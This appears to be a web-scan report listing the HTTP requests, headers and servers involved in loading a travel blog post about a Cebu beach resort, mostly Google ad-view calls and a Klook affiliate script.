https://googleads.g.doubleclick.net/pagead/adview?ai=COs7NSotmYOLwBcXG7_UPy7m34AKh4Jz9Ydm_1pbZDd2qvNfyAhABIMXPnxMoBmCViriCyAegAZr26tUDyAEBqQLx9Vf5JsOzPqgDAcgDAqoEmAJP0MPS259h00OxcDKsIBeV49m44p80UIDw5HThrCoROC-sxyobbldqXN2dc4MYLJKl_-3SVAJyyZVWhDLC5Nq5CR8cCISjZ5Y3rk53r6waMC4Msja6XmOJA2OXofDvNx7uOEWE0WsUvWdhOW64vHWSBatitBXwD2DUCwpbvI5wA5Rsg21jiRoOAYmxREILVrPmjW9vUmr68WGOsj0mdvjjb-YHelU6lRz7qfeMzs6tqRHaDUhO9L1-dGk_8JkCRRJw0GdUPnsg1dNwCF6Mc6pTrHDOpd6IedzcXPtO6J_hMPf2kdHqMQxrVizeyXvkd_oVxhJTzLF9qAut59ksFZiZuoSZnoKA3Qms7JvZG1E4Yn4ucOJ-yhpTwAStw6WvvQOSBQQIBBgBkgUECAUYBKAGUYAHzomVKqgH1ckbqAfw2RuoB_LZG6gHjs4bqAeT2BuoB7oGqAfulrECqAemvhuoB-zVG9gHAfIHBBCE6mzSCAkIgOGAEBABGB-ACgHICwHCEwYYmvbq1QPYEwrQFQGAFwGyFxoKGAgAEhRwdWItNjc2MTYxMTg4MDM1MTA1Mw&sigh=StHRfHUrXVE&tpd=AGWhJms7WCGjn6EMnCwlHcCzVK3-3Nkxs_96XrT62U1-q672lw

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 3A61 0
0 18ms
16ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=CJSHISotmYOLwBcXG7_UPy7m34AKB1tyNYpbnt7i0DayozMqMDhACIMXPnxMoBmCViriCyAegAfC-rtEDyAEGqQLx9Vf5JsOzPqgDAcgDAqoElQJP0LS_xp9i00OxcDKsIBeV49m44p80UIDw5HThrCoROC-sxyobbldqXN2dc4MYLJKl_-3SVAJyyZVWhDLC5Nq5CR8cCISjZ5Y3rk53r6waMC4Msja6XmOJA2OXofDvNx7uOEWE0WsUvWdhOW64vHWSBatitBXwD2DUCwpbvI5wA5Rsg21jiRoOAYmxREILVrvmcGS1PZjhQN1KWZq5nxNT3Absy67VY-z8XPTIO81pXBNa-EpPgad6AXM6BbgCsDMwJWQUy3giANBy3V2MhqlRWXPMUN2IjN_dqfhPHZzhxfT2ZNLqxA9roy_ePHjkgvkVMxFDLLeziawU-RQC2JDZII7MDHM_GAdGDo9d1BfogUWL48xlwASEiPPIxwOSBQQIBBgBkgUECAUYBKAGN4AH-MDRLqgH1ckbqAfw2RuoB_LZG6gHjs4bqAeT2BuoB7oGqAfulrECqAemvhuoB-zVG9gHAfIHBBCE6mzSCAkIgOGAEBABGB-ACgHICwHCEwYY8L6u0QPYEw3QFQGAFwGyFxoKGAgAEhRwdWItNjc2MTYxMTg4MDM1MTA1Mw&sigh=gOL0ov0WHCI&template_id=492&tpd=AGWhJmvO2BCN2scydrtATmP_H-hnpbiru37DqdTJKa-kzok26g

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 3A61 0
0 18ms
17ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=CBf91SotmYOLwBcXG7_UPy7m34AKl1Z2xBY3cwrqfAqaerY1rEAMgxc-fEygGYJWKuILIB8gBAagDAcgDAqoE7gFP0Cl5179gWUIRBleseQnP-My85oUjU4qx_zXveUajCxKqii9QbleBbl30XZ8cK9j56rWKVFtsk45DgDbY89mzSARdBsT8eJUzsEpusKgHLWlNsDGjU2SDDSCR-Lz3bxz6e0bM0m0d830pOGS5pyqPRu9_-Ai8ByjAABlbuY85D9xtkyD2p_zPBXBYRmYlv3hXY0S0U3r68Talrz2VdxCkKO1veac9lRz6Ke7Nzs4tqTLaDUgPdKR7dGk90LsCRRIw0GdWPnsi9dNwCF6Nc6pRrHDOpd6IedzdXPtO6J_hMPf2kdHqMQx7QykDK8DSwASlwMuKNJIFBAgaGASgBkXABguAB-X34jWoB9XJG6gH8NkbqAfy2RuoB47OG6gHk9gbqAe6BqgH7paxAqgHpr4bqAfs1RvYBwHyBwQQhOps0ggJCIDhgBAQARgfgAoByAsB0BUBgBcBshcaChgIABIUcHViLTY3NjE2MTE4ODAzNTEwNTM&sigh=JHsFnutNbi0&tpd=AGWhJmuoSP8831QGumkqfD1LBvpAmDDeNbGFbLOpi5-hz_KgDw

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 3A61 0
0 19ms
17ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=CTEFASotmYOLwBcXG7_UPy7m34ALnjNn3Yf6b9qvNCsCNtwEQBCDFz58TKAZglYq4gsgHoAHhzY_QA8gBAakC8fVX-SbDsz6oAwHIAwKqBJcCT9DYucSfZNNDsXAyrCAXlePZuOKfNFCA8OR04awqETgvrMcqG25XalzdnXODGCySpf_t0lQCcsmVVoQywuTauQkfHAiEo2eWN65Od6-sGjAuDLI2ul5jiQNjl6Hw7zce7jhFhNFrFL1nYTluuLx1kgWrYrQV8A9g1AsKW7yOcAOUbINtY4kaDgGJsURCC1az5vUjMdyaEVbpSlmNlJ8TUtUG7IqhyGMf-6mzPThNLagQL_tKz22hjoJqP9K797NRMNBnoch6AvXThf5djHOopFpzzqXefY_e3Vz7ux6c4TD3A2fS6jEMnqAv3sl7EYH5FcYCoypwVI2aSSItVbCnQyqbhETjkrPAvWTwsj6uKclgMi4URySmwASYgqPOzQGIBfiFsN4DkgUKCAMQARgBOgIIBZIFBAgEGAGSBQQIBRgEoAZRgAeHsvAvqAfVyRuoB_DZG6gH8tkbqAeOzhuoB5PYG6gHugaoB-6WsQKoB6a-G6gH7NUb2AcB8gcEEITqbNIICQiA4YAQEAEYH4AKAcgLAcITBhjhzY_QA9gTCtAVAYAXAbIXGgoYCAASFHB1Yi02NzYxNjExODgwMzUxMDUz&sigh=o9mS5YvSBPM&tpd=AGWhJmu7zcImLDS0QvAD3GhhQ9XfGj4oSEyKytU1jcGJXL230w

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 3A61 0
0 19ms
18ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=CJgi6SotmYOLwBcXG7_UPy7m34AKl1Z2xBY3cwrqfAqaerY1rEAUgxc-fEygGYJWKuILIB8gBAagDAcgDAqoE7gFP0Cl50b9gWUIRBleseQnP-My85oUjU4qx_zXveUajCxKqii9QbleBbl30XZ8cK9j56rWKVFtsk45DgDbY89mzSARdBsT8eJUzsEpusKgHLWlNsDGjU2SDDSCR-Lz3bxz6e0bM0m0d830pOGS5pyqPRu9_-Ai8ByjAABlbuY85D9xtkyD2p_zPBXBYRmYlv3hXY0S0U3r68Talrz2VdxCkKO1veac9lRz6Ke7Nzs4tqTLaDUgPdKR7dGk90LsCRRIw0GdWPnsi9dNwCF6Nc6pRrHDOpd6IedzdXPtO6J_hMPf2kdHqMQx7QykDK8DSwASlwMuKNJIFBAgaGASgBkXABguAB-X34jWoB9XJG6gH8NkbqAfy2RuoB47OG6gHk9gbqAe6BqgH7paxAqgHpr4bqAfs1RvYBwHyBwQQhOps0ggJCIDhgBAQARgfgAoByAsB0BUBgBcBshcaChgIABIUcHViLTY3NjE2MTE4ODAzNTEwNTM&sigh=ct-YVMxszdc&tpd=AGWhJms40VP2dR2x4UJS1Y41p9e8G7iBhDZIazVgtLnT4v_X7w

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 adview
googleads.g.doubleclick.net/pagead/ Frame 3A61 0
0 19ms
18ms Fetch
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/adview?ai=CgEr_SotmYOLwBcXG7_UPy7m34AKl1Z2xBY3cwrqfAqaerY1rEAYgxc-fEygGYJWKuILIB8gBAagDAcgDAqoE7gFP0Cl50r9gWUIRBleseQnP-My85oUjU4qx_zXveUajCxKqii9QbleBbl30XZ8cK9j56rWKVFtsk45DgDbY89mzSARdBsT8eJUzsEpusKgHLWlNsDGjU2SDDSCR-Lz3bxz6e0bM0m0d830pOGS5pyqPRu9_-Ai8ByjAABlbuY85D9xtkyD2p_zPBXBYRmYlv3hXY0S0U3r68Talrz2VdxCkKO1veac9lRz6Ke7Nzs4tqTLaDUgPdKR7dGk90LsCRRIw0GdWPnsi9dNwCF6Nc6pRrHDOpd6IedzdXPtO6J_hMPf2kdHqMQx7QykDK8DSwASlwMuKNJIFBAgaGASgBkXABguAB-X34jWoB9XJG6gH8NkbqAfy2RuoB47OG6gHk9gbqAe6BqgH7paxAqgHpr4bqAfs1RvYBwHyBwQQhOps0ggJCIDhgBAQARgfgAoByAsB0BUBgBcBshcaChgIABIUcHViLTY3NjE2MTE4ODAzNTEwNTM&sigh=lqwvaG85e9E&tpd=AGWhJmt0b3v6JbPln4DqKt7WUx-3LWD5vU2-FaXVS-AIcZwvwQ

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

Security Headers

Name	Value
Content-Security-Policy	script-src 'none'; object-src 'none'
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
content-security-policy: script-src 'none'; object-src 'none'
x-content-type-options: nosniff
server: cafe
date: Fri, 02 Apr 2021 03:11:06 GMT
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 0
x-xss-protection: 0

GET
H3-Q050 200 cookie_push_onload.html Show response
pagead2.googlesyndication.com/pagead/s/ Frame 814D 1 KB
750 B 6ms
6ms Document
text/html 2a00:1450:4001:812::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://pagead2.googlesyndication.com/pagead/s/cookie_push_onload.html

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:812::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

9a9b7fb32e01fd70747f32efdbd0472fd681c85eebb0c42d10c7a514820a0062

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: pagead2.googlesyndication.com
:scheme: https
:path: /pagead/s/cookie_push_onload.html
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://googleads.g.doubleclick.net/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://googleads.g.doubleclick.net/

Response headers

p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
vary: Accept-Encoding
date: Thu, 01 Apr 2021 03:14:09 GMT
expires: Fri, 02 Apr 2021 03:14:09 GMT
content-type: text/html; charset=UTF-8
etag: 48472445140208031
x-content-type-options: nosniff
content-encoding: gzip
server: cafe
content-length: 724
x-xss-protection: 0
cache-control: public, max-age=86400
age: 86217
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"

GET
H2 200 affiliate_base_v3.js Show response
cdn.klook.com/affiliate_web/s/dist/desktop/ 5 KB
2 KB 167ms
112ms Script
application/javascript 2600:9000:2127:9400:1b:29b:ed80:93a1
AMAZON-02

General

Check archive.org

Show headers Download Go to

Full URL

https://cdn.klook.com/affiliate_web/s/dist/desktop/affiliate_base_v3.js

Requested by

Host: www.itravelrox.com
URL: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2600:9000:2127:9400:1b:29b:ed80:93a1 , United States, ASN16509 (AMAZON-02, US),

Reverse DNS

Software

nginx /

Resource Hash

22400a789498fc8ea6a6105b7c95f9a9c29384cd754c4434b9c5b4f399342eeb

Security Headers

Name	Value
Strict-Transport-Security	max-age=63072000; includeSubdomains

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Wed, 03 Feb 2021 04:04:35 GMT
content-encoding: gzip
